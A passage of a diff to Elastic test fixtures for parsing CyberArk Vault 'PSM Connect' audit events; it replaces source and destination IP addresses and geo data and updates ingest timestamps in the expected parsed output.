{\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 11 12:23:25\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-11T20:23:25Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e300\u003c/MessageID\u003e\\n \u003cDesc\u003ePSM Connect\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\\n \u003cAction\u003ePSM Connect\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003ePSM\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\Operating System-UnixSSHKeys-34.123.103.115-adrian\u003c/File\u003e\\n \u003cStation\u003e81.32.170.205\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003eApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=ssh;PSMID=PSMServer;SessionID=988b22e8-82a7-11eb-83b9-080027efd402;SrcHost=10.0.2.2;User=adrian;\u003c/ExtraDetails\u003e\\n \u003cMessage\u003ePSM Connect\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003cCAProperties\u003e\\n \u003cCAProperty Name=\\\"PolicyID\\\" Value=\\\"UnixSSHKeys\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UserName\\\" Value=\\\"adrian\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Address\\\" Value=\\\"34.123.103.115\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CreationMethod\\\" Value=\\\"PVWA\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"DeviceType\\\" Value=\\\"Operating System\\\"\u003e\u003c/CAProperty\u003e\\n \u003c/CAProperties\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 11 12:23:25\",\"IsoTimestamp\":\"2021-03-11T20:23:25Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"300\",\"Desc\":\"PSM Connect\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"PSM Connect\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"PSM\",\"File\":\"Root\\\\Operating System-UnixSSHKeys-34.123.103.115-adrian\",\"Station\":\"81.32.170.205\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=ssh;PSMID=PSMServer;SessionID=988b22e8-82a7-11eb-83b9-080027efd402;SrcHost=10.0.2.2;User=adrian;\",\"Message\":\"PSM Connect\",\"GatewayStation\":\"\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"UnixSSHKeys\"},{\"Name\":\"UserName\",\"Value\":\"adrian\"},{\"Name\":\"Address\",\"Value\":\"34.123.103.115\"},{\"Name\":\"CreationMethod\",\"Value\":\"PVWA\"},{\"Name\":\"DeviceType\",\"Value\":\"Operating System\"}]}}}}", + "ingested": "2021-12-09T13:36:47.331168Z", + "original": "\u003c5\u003e1 2021-03-11T20:23:25Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 11 12:23:25\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-11T20:23:25Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e300\u003c/MessageID\u003e\\n \u003cDesc\u003ePSM Connect\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\\n \u003cAction\u003ePSM Connect\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003ePSM\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\Operating System-UnixSSHKeys-67.43.156.15-adrian\u003c/File\u003e\\n \u003cStation\u003e67.43.156.13\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003eApplicationType=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=ssh;PSMID=PSMServer;SessionID=988b22e8-82a7-11eb-83b9-080027efd402;SrcHost=10.0.2.2;User=adrian;\u003c/ExtraDetails\u003e\\n \u003cMessage\u003ePSM Connect\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003cCAProperties\u003e\\n \u003cCAProperty Name=\\\"PolicyID\\\" Value=\\\"UnixSSHKeys\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UserName\\\" Value=\\\"adrian\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Address\\\" Value=\\\"67.43.156.15\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CreationMethod\\\" Value=\\\"PVWA\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"DeviceType\\\" Value=\\\"Operating System\\\"\u003e\u003c/CAProperty\u003e\\n \u003c/CAProperties\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 11 12:23:25\",\"IsoTimestamp\":\"2021-03-11T20:23:25Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"300\",\"Desc\":\"PSM Connect\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"PSM Connect\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"PSM\",\"File\":\"Root\\\\Operating System-UnixSSHKeys-67.43.156.15-adrian\",\"Station\":\"67.43.156.13\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"ApplicationType=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=ssh;PSMID=PSMServer;SessionID=988b22e8-82a7-11eb-83b9-080027efd402;SrcHost=10.0.2.2;User=adrian;\",\"Message\":\"PSM Connect\",\"GatewayStation\":\"\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"UnixSSHKeys\"},{\"Name\":\"UserName\",\"Value\":\"adrian\"},{\"Name\":\"Address\",\"Value\":\"67.43.156.15\"},{\"Name\":\"CreationMethod\",\"Value\":\"PVWA\"},{\"Name\":\"DeviceType\",\"Value\":\"Operating System\"}]}}}}", "code": "300", "kind": "event", "action": "psm connect", @@ -814,39 +760,18 @@ } }, "destination": { - "geo": { - "continent_name": "North America", - "country_name": "United States", - "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" - }, - "address": "34.123.103.115", "user": { "name": "testark" }, - "ip": "34.123.103.115" + "address": "67.43.156.15", + "ip": "67.43.156.15" }, "source": { - "geo": { - "continent_name": "Europe", - "region_iso_code": "ES-B", - "city_name": "Barcelona", - "country_iso_code": "ES", - "country_name": "Spain", - "region_name": "Barcelona", - "location": { - "lon": 2.1611, - "lat": 41.3891 - } - }, - "address": "81.32.170.205", "user": { "name": "Administrator" }, - "ip": "81.32.170.205" + "address": "67.43.156.13", + "ip": "67.43.156.13" }, "tags": [ "preserve_original_event" @@ -863,7 +788,7 @@ }, "@timestamp": "2021-03-14T13:49:37.000Z", "file": { - "path": "Root\\Operating System-UnixSSH-34.123.103.115-testark" + "path": "Root\\Operating System-UnixSSH-67.43.156.15-testark" }, "ecs": { "version": "1.12.0" @@ -874,16 +799,15 @@ "testark" ], "ip": [ - "81.32.170.205", - "34.123.103.115", - "34.71.250.247" + "67.43.156.13", + "67.43.156.15" ] }, "cyberarkpas": { "audit": { "severity": "Info", "iso_timestamp": "2021-03-14T13:49:37Z", - "raw": "\u003csyslog\u003e\n\n \u003caudit_record\u003e\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\n \u003cTimestamp\u003eMar 14 06:49:37\u003c/Timestamp\u003e\n \u003cIsoTimestamp\u003e2021-03-14T13:49:37Z\u003c/IsoTimestamp\u003e\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\n \u003cProduct\u003eVault\u003c/Product\u003e\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\n \u003cMessageID\u003e300\u003c/MessageID\u003e\n \u003cDesc\u003ePSM Connect\u003c/Desc\u003e\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\n \u003cAction\u003ePSM Connect\u003c/Action\u003e\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\n \u003cSafe\u003epartner\u003c/Safe\u003e\n \u003cFile\u003eRoot\\Operating System-UnixSSH-34.123.103.115-testark\u003c/File\u003e\n \u003cStation\u003e34.71.250.247\u003c/Station\u003e\n \u003cLocation\u003e\u003c/Location\u003e\n \u003cCategory\u003e\u003c/Category\u003e\n \u003cRequestId\u003e\u003c/RequestId\u003e\n \u003cReason\u003e\u003c/Reason\u003e\n \u003cExtraDetails\u003eApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=d284c268-2ba0-4366-af52-e33459b073a1;SrcHost=81.32.170.205;User=testark;\u003c/ExtraDetails\u003e\n \u003cMessage\u003ePSM Connect\u003c/Message\u003e\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\n \u003cCAProperties\u003e\n \u003cCAProperty Name=\"PolicyID\" Value=\"UnixSSH\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"UserName\" Value=\"testark\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"Address\" Value=\"34.123.103.115\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"ResetImmediately\" Value=\"ReconcileTask\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"CPMStatus\" Value=\"failure\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"RetriesCount\" Value=\"0\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"LastFailDate\" Value=\"1615729572\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"LastTask\" Value=\"ReconcileTask\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"CPMErrorDetails\" Value=\"First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"CreationMethod\" Value=\"PVWA\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"DeviceType\" Value=\"Operating System\"\u003e\u003c/CAProperty\u003e\n \u003c/CAProperties\u003e\n \u003c/audit_record\u003e\n\n\u003c/syslog\u003e", + "raw": "\u003csyslog\u003e\n\n \u003caudit_record\u003e\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\n \u003cTimestamp\u003eMar 14 06:49:37\u003c/Timestamp\u003e\n \u003cIsoTimestamp\u003e2021-03-14T13:49:37Z\u003c/IsoTimestamp\u003e\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\n \u003cProduct\u003eVault\u003c/Product\u003e\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\n \u003cMessageID\u003e300\u003c/MessageID\u003e\n \u003cDesc\u003ePSM Connect\u003c/Desc\u003e\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\n \u003cAction\u003ePSM Connect\u003c/Action\u003e\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\n \u003cSafe\u003epartner\u003c/Safe\u003e\n \u003cFile\u003eRoot\\Operating System-UnixSSH-67.43.156.15-testark\u003c/File\u003e\n \u003cStation\u003e67.43.156.15\u003c/Station\u003e\n \u003cLocation\u003e\u003c/Location\u003e\n \u003cCategory\u003e\u003c/Category\u003e\n \u003cRequestId\u003e\u003c/RequestId\u003e\n \u003cReason\u003e\u003c/Reason\u003e\n \u003cExtraDetails\u003eApplicationType=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=d284c268-2ba0-4366-af52-e33459b073a1;SrcHost=67.43.156.13;User=testark;\u003c/ExtraDetails\u003e\n \u003cMessage\u003ePSM Connect\u003c/Message\u003e\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\n \u003cCAProperties\u003e\n \u003cCAProperty Name=\"PolicyID\" Value=\"UnixSSH\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"UserName\" Value=\"testark\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"Address\" Value=\"67.43.156.15\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"ResetImmediately\" Value=\"ReconcileTask\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"CPMStatus\" Value=\"failure\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"RetriesCount\" Value=\"0\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"LastFailDate\" Value=\"1615729572\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"LastTask\" Value=\"ReconcileTask\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"CPMErrorDetails\" Value=\"First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"CreationMethod\" Value=\"PVWA\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"DeviceType\" Value=\"Operating System\"\u003e\u003c/CAProperty\u003e\n \u003c/CAProperties\u003e\n \u003c/audit_record\u003e\n\n\u003c/syslog\u003e", "message": "PSM Connect", "issuer": "Administrator", "extra_details": { @@ -895,13 +819,13 @@ "application_type": "PSMP-SSH", "psmid": "PSMServer", "session_id": "d284c268-2ba0-4366-af52-e33459b073a1", - "src_host": "81.32.170.205", - "dst_host": "34.123.103.115" + "src_host": "67.43.156.13", + "dst_host": "67.43.156.15" }, "rfc5424": true, "ca_properties": { "other": {}, - "address": "34.123.103.115", + "address": "67.43.156.15", "creation_method": "PVWA", "cpm_status": "failure", "policy_id": "UnixSSH", @@ -913,9 +837,9 @@ "reset_immediately": "ReconcileTask", "last_task": "ReconcileTask" }, - "file": "Root\\Operating System-UnixSSH-34.123.103.115-testark", + "file": "Root\\Operating System-UnixSSH-67.43.156.15-testark", "safe": "partner", - "station": "34.71.250.247", + "station": "67.43.156.15", "action": "PSM Connect", "timestamp": "Mar 14 06:49:37", "desc": "PSM Connect" @@ -926,8 +850,8 @@ }, "event": { "severity": 2, - "ingested": "2021-06-09T10:24:30.936282500Z", - "original": "\u003c5\u003e1 2021-03-14T13:49:37Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 14 06:49:37\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-14T13:49:37Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e300\u003c/MessageID\u003e\\n \u003cDesc\u003ePSM Connect\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\\n \u003cAction\u003ePSM Connect\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003epartner\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\Operating System-UnixSSH-34.123.103.115-testark\u003c/File\u003e\\n \u003cStation\u003e34.71.250.247\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003eApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=d284c268-2ba0-4366-af52-e33459b073a1;SrcHost=81.32.170.205;User=testark;\u003c/ExtraDetails\u003e\\n \u003cMessage\u003ePSM Connect\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003cCAProperties\u003e\\n \u003cCAProperty Name=\\\"PolicyID\\\" Value=\\\"UnixSSH\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UserName\\\" Value=\\\"testark\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Address\\\" Value=\\\"34.123.103.115\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"ResetImmediately\\\" Value=\\\"ReconcileTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMStatus\\\" Value=\\\"failure\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"RetriesCount\\\" Value=\\\"0\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastFailDate\\\" Value=\\\"1615729572\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastTask\\\" Value=\\\"ReconcileTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMErrorDetails\\\" Value=\\\"First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CreationMethod\\\" Value=\\\"PVWA\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"DeviceType\\\" Value=\\\"Operating System\\\"\u003e\u003c/CAProperty\u003e\\n \u003c/CAProperties\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 14 06:49:37\",\"IsoTimestamp\":\"2021-03-14T13:49:37Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"300\",\"Desc\":\"PSM Connect\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"PSM Connect\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"partner\",\"File\":\"Root\\\\Operating System-UnixSSH-34.123.103.115-testark\",\"Station\":\"34.71.250.247\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=d284c268-2ba0-4366-af52-e33459b073a1;SrcHost=81.32.170.205;User=testark;\",\"Message\":\"PSM Connect\",\"GatewayStation\":\"\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"UnixSSH\"},{\"Name\":\"UserName\",\"Value\":\"testark\"},{\"Name\":\"Address\",\"Value\":\"34.123.103.115\"},{\"Name\":\"ResetImmediately\",\"Value\":\"ReconcileTask\"},{\"Name\":\"CPMStatus\",\"Value\":\"failure\"},{\"Name\":\"RetriesCount\",\"Value\":\"0\"},{\"Name\":\"LastFailDate\",\"Value\":\"1615729572\"},{\"Name\":\"LastTask\",\"Value\":\"ReconcileTask\"},{\"Name\":\"CPMErrorDetails\",\"Value\":\"First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031\"},{\"Name\":\"CreationMethod\",\"Value\":\"PVWA\"},{\"Name\":\"DeviceType\",\"Value\":\"Operating System\"}]}}}}", + "ingested": "2021-12-09T13:36:47.331173800Z", + "original": "\u003c5\u003e1 2021-03-14T13:49:37Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 14 06:49:37\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-14T13:49:37Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e300\u003c/MessageID\u003e\\n \u003cDesc\u003ePSM Connect\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\\n \u003cAction\u003ePSM Connect\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003epartner\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\Operating System-UnixSSH-67.43.156.15-testark\u003c/File\u003e\\n \u003cStation\u003e67.43.156.15\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003eApplicationType=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=d284c268-2ba0-4366-af52-e33459b073a1;SrcHost=67.43.156.13;User=testark;\u003c/ExtraDetails\u003e\\n \u003cMessage\u003ePSM Connect\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003cCAProperties\u003e\\n \u003cCAProperty Name=\\\"PolicyID\\\" Value=\\\"UnixSSH\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UserName\\\" Value=\\\"testark\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Address\\\" Value=\\\"67.43.156.15\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"ResetImmediately\\\" Value=\\\"ReconcileTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMStatus\\\" Value=\\\"failure\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"RetriesCount\\\" Value=\\\"0\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastFailDate\\\" Value=\\\"1615729572\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastTask\\\" Value=\\\"ReconcileTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMErrorDetails\\\" Value=\\\"First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CreationMethod\\\" Value=\\\"PVWA\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"DeviceType\\\" Value=\\\"Operating System\\\"\u003e\u003c/CAProperty\u003e\\n \u003c/CAProperties\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 14 06:49:37\",\"IsoTimestamp\":\"2021-03-14T13:49:37Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"300\",\"Desc\":\"PSM Connect\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"PSM Connect\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"partner\",\"File\":\"Root\\\\Operating System-UnixSSH-67.43.156.15-testark\",\"Station\":\"67.43.156.15\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"ApplicationType=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=d284c268-2ba0-4366-af52-e33459b073a1;SrcHost=67.43.156.13;User=testark;\",\"Message\":\"PSM Connect\",\"GatewayStation\":\"\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"UnixSSH\"},{\"Name\":\"UserName\",\"Value\":\"testark\"},{\"Name\":\"Address\",\"Value\":\"67.43.156.15\"},{\"Name\":\"ResetImmediately\",\"Value\":\"ReconcileTask\"},{\"Name\":\"CPMStatus\",\"Value\":\"failure\"},{\"Name\":\"RetriesCount\",\"Value\":\"0\"},{\"Name\":\"LastFailDate\",\"Value\":\"1615729572\"},{\"Name\":\"LastTask\",\"Value\":\"ReconcileTask\"},{\"Name\":\"CPMErrorDetails\",\"Value\":\"First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031\"},{\"Name\":\"CreationMethod\",\"Value\":\"PVWA\"},{\"Name\":\"DeviceType\",\"Value\":\"Operating System\"}]}}}}", "code": "300", "kind": "event", "action": "psm connect", @@ -950,39 +874,18 @@ } }, "destination": { - "geo": { - "continent_name": "North America", - "country_name": "United States", - "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" - }, - "address": "34.123.103.115", "user": { "name": "testark" }, - "ip": "34.123.103.115" + "address": "67.43.156.15", + "ip": "67.43.156.15" }, "source": { - "geo": { - "continent_name": "Europe", - "region_iso_code": "ES-B", - "city_name": "Barcelona", - "country_iso_code": "ES", - "country_name": "Spain", - "region_name": "Barcelona", - "location": { - "lon": 2.1611, - "lat": 41.3891 - } - }, - "address": "81.32.170.205", "user": { "name": "Administrator" }, - "ip": "81.32.170.205" + "address": "67.43.156.13", + "ip": "67.43.156.13" }, "tags": [ "preserve_original_event" @@ -999,7 +902,7 @@ }, "@timestamp": "2021-03-14T13:50:43.000Z", "file": { - "path": "Root\\Operating System-UnixSSH-34.123.103.115-testark" + "path": "Root\\Operating System-UnixSSH-67.43.156.15-testark" }, "ecs": { "version": "1.12.0" @@ -1010,16 +913,15 @@ "testark" ], "ip": [ - "81.32.170.205", - "34.123.103.115", - "34.71.250.247" + "67.43.156.13", + "67.43.156.15" ] }, "cyberarkpas": { "audit": { "severity": "Info", "iso_timestamp": "2021-03-14T13:50:43Z", - "raw": "\u003csyslog\u003e\n\n \u003caudit_record\u003e\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\n \u003cTimestamp\u003eMar 14 06:50:43\u003c/Timestamp\u003e\n \u003cIsoTimestamp\u003e2021-03-14T13:50:43Z\u003c/IsoTimestamp\u003e\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\n \u003cProduct\u003eVault\u003c/Product\u003e\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\n \u003cMessageID\u003e300\u003c/MessageID\u003e\n \u003cDesc\u003ePSM Connect\u003c/Desc\u003e\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\n \u003cAction\u003ePSM Connect\u003c/Action\u003e\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\n \u003cSafe\u003epartner\u003c/Safe\u003e\n \u003cFile\u003eRoot\\Operating System-UnixSSH-34.123.103.115-testark\u003c/File\u003e\n 